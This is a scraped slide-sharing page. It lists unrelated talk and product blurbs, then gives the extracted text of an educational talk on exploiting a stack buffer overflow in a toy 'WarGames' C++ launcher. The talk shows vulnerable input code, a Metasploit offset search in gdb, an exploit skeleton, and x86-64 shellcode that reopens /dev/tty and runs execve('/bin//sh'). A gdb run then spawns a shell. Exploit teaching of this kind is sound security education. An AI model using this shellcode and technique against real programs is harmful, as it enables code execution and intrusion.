How can you squeeze Security into DevOps? Security is often an understaffed function, so how can you leverage what you have in DevOps to improve your security posture? We will reveal processes already in place that can be used to improve security. This fine tuning of tools and processes can give you DevSecOps on a shoestring.
The document discusses various topics related to the C++ programming language such as its similarities to JavaScript, emergent features, retrofitted features, varying implementations, surprising runtime behavior, and bad error messages. It also includes quotes about C++ from Bjarne Stroustrup noting that all languages receive complaints but the ones nobody uses are not as popular.
Reading Other Peoples Code (NDC London 2019)Patricia Aas
Someone else's code. Even worse, thousands of lines, maybe hundreds of files of other peoples code. Is there a way to methodically read and understand other peoples work, build their mental models?
In this talk I will go through techniques I have developed throughout 18 years of programming. Hopefully you will walk away with a plan on how to approach a new code base. But even more I hope you walk away with a feeling of curiosity, wanting to get to know your fellow programmers through their code.
Software Engineering, Software Consulting, Tech Lead, Spring Boot, Spring Cloud, Spring Core, Spring JDBC, Spring Transaction, Spring MVC, OpenShift Cloud Platform, Kafka, REST, SOAP, LLD & HLD.
8 Best Automated Android App Testing Tool and Framework in 2024.pdfkalichargn70th171
Regarding mobile operating systems, two major players dominate our thoughts: Android and iPhone. With Android leading the market, software development companies are focused on delivering apps compatible with this OS. Ensuring an app's functionality across various Android devices, OS versions, and hardware specifications is critical, making Android app testing essential.
SOCRadar's Aviation Industry Q1 Incident Report is out now!
The aviation industry has always been a prime target for cybercriminals due to its critical infrastructure and high stakes. In the first quarter of 2024, the sector faced an alarming surge in cybersecurity threats, revealing its vulnerabilities and the relentless sophistication of cyber attackers.
SOCRadar’s Aviation Industry, Quarterly Incident Report, provides an in-depth analysis of these threats, detected and examined through our extensive monitoring of hacker forums, Telegram channels, and dark web platforms.
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j
Dr. Jesús Barrasa, Head of Solutions Architecture for EMEA, Neo4j
Découvrez les dernières innovations de Neo4j, et notamment les dernières intégrations cloud et les améliorations produits qui font de Neo4j un choix essentiel pour les développeurs qui créent des applications avec des données interconnectées et de l’IA générative.
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsPeter Muessig
The UI5 tooling is the development and build tooling of UI5. It is built in a modular and extensible way so that it can be easily extended by your needs. This session will showcase various tooling extensions which can boost your development experience by far so that you can really work offline, transpile your code in your project to use even newer versions of EcmaScript (than 2022 which is supported right now by the UI5 tooling), consume any npm package of your choice in your project, using different kind of proxies, and even stitching UI5 projects during development together to mimic your target environment.
SMS API Integration in Saudi Arabia| Best SMS API ServiceYara Milbes
Discover the benefits and implementation of SMS API integration in the UAE and Middle East. This comprehensive guide covers the importance of SMS messaging APIs, the advantages of bulk SMS APIs, and real-world case studies. Learn how CEQUENS, a leader in communication solutions, can help your business enhance customer engagement and streamline operations with innovative CPaaS, reliable SMS APIs, and omnichannel solutions, including WhatsApp Business. Perfect for businesses seeking to optimize their communication strategies in the digital age.
UI5con 2024 - Keynote: Latest News about UI5 and it’s EcosystemPeter Muessig
Learn about the latest innovations in and around OpenUI5/SAPUI5: UI5 Tooling, UI5 linter, UI5 Web Components, Web Components Integration, UI5 2.x, UI5 GenAI.
Recording:
https://www.youtube.com/live/MSdGLG2zLy8?si=INxBHTqkwHhxV5Ta&t=0
Do you want Software for your Business? Visit Deuglo
Deuglo has top Software Developers in India. They are experts in software development and help design and create custom Software solutions.
Deuglo follows seven steps methods for delivering their services to their customers. They called it the Software development life cycle process (SDLC).
Requirement — Collecting the Requirements is the first Phase in the SSLC process.
Feasibility Study — after completing the requirement process they move to the design phase.
Design — in this phase, they start designing the software.
Coding — when designing is completed, the developers start coding for the software.
Testing — in this phase when the coding of the software is done the testing team will start testing.
Installation — after completion of testing, the application opens to the live server and launches!
Maintenance — after completing the software development, customers start using the software.
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j
Dr. Jesús Barrasa, Head of Solutions Architecture for EMEA, Neo4j
Découvrez les dernières innovations de Neo4j, et notamment les dernières intégrations cloud et les améliorations produits qui font de Neo4j un choix essentiel pour les développeurs qui créent des applications avec des données interconnectées et de l’IA générative.
Revolutionizing Visual Effects Mastering AI Face Swaps.pdfUndress Baby
The quest for the best AI face swap solution is marked by an amalgamation of technological prowess and artistic finesse, where cutting-edge algorithms seamlessly replace faces in images or videos with striking realism. Leveraging advanced deep learning techniques, the best AI face swap tools meticulously analyze facial features, lighting conditions, and expressions to execute flawless transformations, ensuring natural-looking results that blur the line between reality and illusion, captivating users with their ingenuity and sophistication.
Web:- https://undressbaby.com/
OpenMetadata Community Meeting - 5th June 2024OpenMetadata
The OpenMetadata Community Meeting was held on June 5th, 2024. In this meeting, we discussed about the data quality capabilities that are integrated with the Incident Manager, providing a complete solution to handle your data observability needs. Watch the end-to-end demo of the data quality features.
* How to run your own data quality framework
* What is the performance impact of running data quality frameworks
* How to run the test cases in your own ETL pipelines
* How the Incident Manager is integrated
* Get notified with alerts when test cases fail
Watch the meeting recording here - https://www.youtube.com/watch?v=UbNOje0kf6E
What is Master Data Management by PiLog Groupaymanquadri279
PiLog Group's Master Data Record Manager (MDRM) is a sophisticated enterprise solution designed to ensure data accuracy, consistency, and governance across various business functions. MDRM integrates advanced data management technologies to cleanse, classify, and standardize master data, thereby enhancing data quality and operational efficiency.
E-Invoicing Implementation: A Step-by-Step Guide for Saudi Arabian CompaniesQuickdice ERP
Explore the seamless transition to e-invoicing with this comprehensive guide tailored for Saudi Arabian businesses. Navigate the process effortlessly with step-by-step instructions designed to streamline implementation and enhance efficiency.
WhatsApp offers simple, reliable, and private messaging and calling services for free worldwide. With end-to-end encryption, your personal messages and calls are secure, ensuring only you and the recipient can access them. Enjoy voice and video calls to stay connected with loved ones or colleagues. Express yourself using stickers, GIFs, or by sharing moments on Status. WhatsApp Business enables global customer outreach, facilitating sales growth and relationship building through showcasing products and services. Stay connected effortlessly with group chats for planning outings with friends or staying updated on family conversations.
Hand Rolled Applicative User ValidationCode KataPhilip Schwarz
Could you use a simple piece of Scala validation code (granted, a very simplistic one too!) that you can rewrite, now and again, to refresh your basic understanding of Applicative operators <*>, <*, *>?
The goal is not to write perfect code showcasing validation, but rather, to provide a small, rough-and ready exercise to reinforce your muscle-memory.
Despite its grandiose-sounding title, this deck consists of just three slides showing the Scala 3 code to be rewritten whenever the details of the operators begin to fade away.
The code is my rough and ready translation of a Haskell user-validation program found in a book called Finding Success (and Failure) in Haskell - Fall in love with applicative functors.
11. 11
$ hello$ clang -o launch launch.c
launch.c:19:3: warning: implicit declaration of
function 'gets' is invalid in C99
[-Wimplicit-function-declaration]
gets(response);
^
1 warning generated.
/tmp/launch-0d1b0f.o: In function
`authenticate_and_launch':
launch.c:(.text+0x5e): warning: the `gets' function is
dangerous and should not be used.
CWE-242: Use of Inherently Dangerous Function @pati_gallardo
26. 26
$ hello
CMakeLists.txt
# Wargames C++
# -------------------------
add_executable(launch_cpp src/launch.cpp)
Start from scratch with C++ @pati_gallardo
48. Shellcode - code that gives you shell
int execve(const char *filename,
char *const argv[],
char *const envp[]);
Target Process
Vulnerable
Program
Target Process
/bin/sh
Shellcode
48
@pati_gallardo
51. 100 char[5]: “ret” address 95
99 char[4]: No-op
98 char[3]: No-op
97 char[2]: No-op
96 char[1]: Shellcode
95 char[0]: Shellcode
Stack
grows
toward
lower
addresses
Instructions
also go
toward
higher
addresses
51
Write direction vs Stack growing direction
@pati_gallardo
52. 52
stack_overflow_exploit.c
@pati_gallardoint main(void) {
char shellcode[] = "";
size_t shellcode_size = (sizeof shellcode) - 1;
int offset = 0; // We need to find the return addr offset
int padded_bytes = offset - shellcode_size;
{
fwrite(shellcode, 1, shellcode_size, stdout);
}
{
char pad[] = "x90"; // No-ops
for (int i = 0; i < padded_bytes; i++)
fwrite(pad, 1, 1, stdout);
}
{
// We need to find the address of the buffer
char addr[] = "";
fwrite(addr, 1, 6, stdout);
}
putchar('0');
}
Basic
structure of
the exploit
code
53. 53
stack_overflow_exploit.c
@pati_gallardoint main(void) {
char shellcode[] = "";
size_t shellcode_size = (sizeof shellcode) - 1;
int offset = 0; // We need to find the return addr offset
int padded_bytes = offset - shellcode_size;
{
fwrite(shellcode, 1, shellcode_size, stdout);
}
{
char pad[] = "x90"; // No-ops
for (int i = 0; i < padded_bytes; i++)
fwrite(pad, 1, 1, stdout);
}
{
// We need to find the address of the buffer
char addr[] = "";
fwrite(addr, 1, 6, stdout);
}
putchar('0');
}
What we need
to know
Offset of
return address
from buffer on
the stack
Address of buffer
in memory
54. 54
launch_bigger.cpp
@pati_gallardovoid launch_missiles(int n) {
printf("Launching %d missilesn", n);
}
void authenticate_and_launch(void) {
int n_missiles = 2;
bool allowaccess = false;
char response[110];
printf("%pn", &response);
printf("Secret: ");
std::cin >> response;
if (strcmp(response, "Joshua") == 0)
allowaccess = true;
if (allowaccess) {
puts("Access granted");
launch_missiles(n_missiles);
}
if (!allowaccess)
puts("Access denied");
}
int main(void) {
puts("WarGames MissileLauncher v0.1");
authenticate_and_launch();
puts("Operation complete");
}
Lets make
some
changes to
make it
easier
Bigger buffer and get
the address
56. Metasploit pattern_create and pattern_offset
Used to find the offset of the return pointer from the start of the buffer
Metasploit pattern_create
Creates a string of un-repeated character sequences
Metasploit pattern_offset
Gives the offset in the character sequence of this section
@pati_gallardo
56
57. 57
@pati_gallardo$ pattern_create -l 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac
1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A
e3Ae4Ae5Ae6Ae7Ae8Ae9
$ clang++ -z execstack -fno-stack-protector -o launch_bigger
launch_bigger.cpp
$ gdb -q ./launch_bigger
(gdb) br *authenticate_and_launch+205
Breakpoint 1 at 0x4008dd
(gdb) r
Starting program: ./launch_bigger
WarGames MissileLauncher v0.1
0x7fffffffdc90
Secret:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac
1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2A
e3Ae4Ae5Ae6Ae7Ae8Ae9
Access granted
Launching 1698771301 missiles
Breakpoint 1, 0x00000000004008dd in authenticate_and_launch() ()
(gdb) x/1xg $sp
0x7fffffffdd18: 0x3765413665413565
(gdb) q
$ pattern_offset -q 3765413665413565
[*] Exact match at offset 136
Find the
offset of the
return
address
Offset of return
address from buffer
on the stack
Address of buffer
in memory
68. New Idea!
Try to close STDIN and reopen tty first
@pati_gallardo
68
69. Write C code for shellcode Compile it
Put bytes in a char buffer Put jmp addr on ret addr
Write inline assembly, eliminating zero bytes
69
@pati_gallardo
71. Write C code for shellcode Compile it
Put bytes in a char buffer Put jmp addr on ret addr
Write inline assembly, eliminating zero bytes
71
@pati_gallardo
72. 72
$ hellowargames$ clang -save-temps -Os -static -fno-stack-protector -o
shellcode shellcode.c
wargames$ ./shellcode
$
wargames$ ldd shellcode
not a dynamic executable
Build it statically, with no canary @pati_gallardo
73. Write C code for shellcode Compile it
Put bytes in a char buffer Put jmp addr on ret addr
Write inline assembly, eliminating zero bytes
73
@pati_gallardo
77. 77
$ hello
shellcode_asm.c
// --------------------------------------------------------
// close
// --------------------------------------------------------
"xor %rdi, %rdint" // Zero out rdi - without using 0
"xor %rax, %raxnt" // Zero out rax - without using 0
"mov $0x3, %alnt" // Write the syscall number (3) to al
"syscallnt" // Do the syscall
%rax # System call %rdi
0x3 3 sys_close unsigned int fd
@pati_gallardo
79. 79
$ hello
shellcode_asm.c
// --------------------------------------------------------
// open
// --------------------------------------------------------
"xor %rax, %raxnt" // Zero out rax - without using 0
"push %raxnt" // Push a string terminator
"movabs $0x7974742f7665642f, %rbxnt" // Put the string in rbx:
// /dev/tty = 2f 64 65 76 2f 74 74 79
"push %rbxnt" // Push rbx on the stack
"mov %rsp, %rsint" // Put a pointer to the string in rsi
"xor %rdx, %rdxnt" // Zero out rdx - without using 0
"xor %rdi, %rdint" // Zero out rdi - without using 0
"xor %r10, %r10nt" // Zero out r10 - without using 0
"mov $0x101, %eaxnt" // Write the syscall number (257)
"syscallnt" // Do the syscall
%rax # System call %rdi %rsi %rdx %r10
0x101 257 sys_openat int dfd const char * filename int flags int mode
@pati_gallardo
81. 81
$ hello
shellcode_asm.c
// --------------------------------------------------------
// execve
// --------------------------------------------------------
"xor %rdx, %rdxnt" // Zero out rdx - without using 0
"xor %rax, %raxnt" // Zero out rax - without using 0
"push %raxnt" // Push a string terminator
"movabs $0x68732f2f6e69622f, %rbxnt" // Put the string in rbx:
// /bin//sh = 2f 62 69 6e 2f 2f 73 68
"push %rbxnt" // Push rbx on the stack
"mov %rsp, %rdint" // Put a pointer to the string in rdi
"push %rdxnt" // Push a null to terminate the array
"push %rdint" // Push the pointer to the string
"mov %rsp, %rsint" // Put a pointer to argv in rsi
"mov $0x3b, %alnt" // Write the syscall number 59 to al
"syscallnt" // Do the syscall
%rax # System call %rdi %rsi %rdx
0x3b 59 sys_execve const char *
filename
const char *
const argv[]
const char *
const envp[]
@pati_gallardo
82. 82
$ hellowargames$ clang -o shellcode_asm shellcode_asm.c
wargames$ ./shellcode_asm
$
Compile and test the assembly @pati_gallardo
✔
84. 84
$ hello
shellcode_asm.c
// --------------------------------------------------------
// open
// --------------------------------------------------------
"xor %rax, %raxnt" // Zero out rax - without using 0
"push %raxnt" // Push a string terminator
"movabs $0x7974742f7665642f, %rbxnt" // Put the string in rbx:
// /dev/tty = 2f 64 65 76 2f 74 74 79
"push %rbxnt" // Push rbx on the stack
"mov %rsp, %rsint" // Put a pointer to the string in rsi
"xor %rdx, %rdxnt" // Zero out rdx - without using 0
"xor %rdi, %rdint" // Zero out rdi - without using 0
"xor %r10, %r10nt" // Zero out r10 - without using 0
"mov $0x101, %eaxnt" // Write syscall number 257 to eax
"syscallnt" // Do the syscall
@pati_gallardo
%rax # System call %rdi %rsi %rdx %r10
0x101 257 sys_openat int dfd const char * filename int flags int mode
85. 85
$ hello
shellcode_asm.c
"mov $0xFF, %alnt" // Write syscall number 255 to al
"inc %raxnt"
"inc %raxnt"
//"mov $0x101, %eaxnt" // Write syscall number 257 to eax
%rax # System call %rdi %rsi %rdx %r10
0x101 257 sys_openat int dfd const char * filename int flags int mode
@pati_gallardo
Write 255 and
inc it twice
87. Write C code for shellcode Compile it
Put bytes in a char buffer Put jmp addr on ret addr
Write inline assembly, eliminating zero bytes
87
@pati_gallardo
90. 90
$ hello$ clang -z execstack -o shellcode_test shellcode_test.c
$ ./shellcode_test
len:77 bytes
$
Compile and test the assembly @pati_gallardo
✔
91. Write C code for shellcode Compile it
Put bytes in a char buffer Put jmp addr on ret addr
Write inline assembly, eliminating zero bytes
91
@pati_gallardo
92. 92
$ hellowargames$ clang -o shellcode_exploit
shellcode_exploit.c
wargames$ ./shellcode_exploit > file
wargames$ gdb -q ./launch_bigger
(gdb) r < file
Starting program: ./launch_bigger < file
WarGames MissileLauncher v0.1
0x7fffffffdc90
Secret: Access denied
process 29337 is executing new program: /bin/dash
$
Use the exploit in gdb @pati_gallardo
✔
104. 104
LINUX SYSTEM CALL TABLE FOR X86 64
http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
Hex to decimal converter
https://www.rapidtables.com/convert/number/hex-to-decimal.html
https://www.asciitohex.com
Weird machines, exploitability, and provable unexploitability - Thomas Dullien/Halvar
Flake
https://vimeo.com/252868605
Resources @pati_gallardo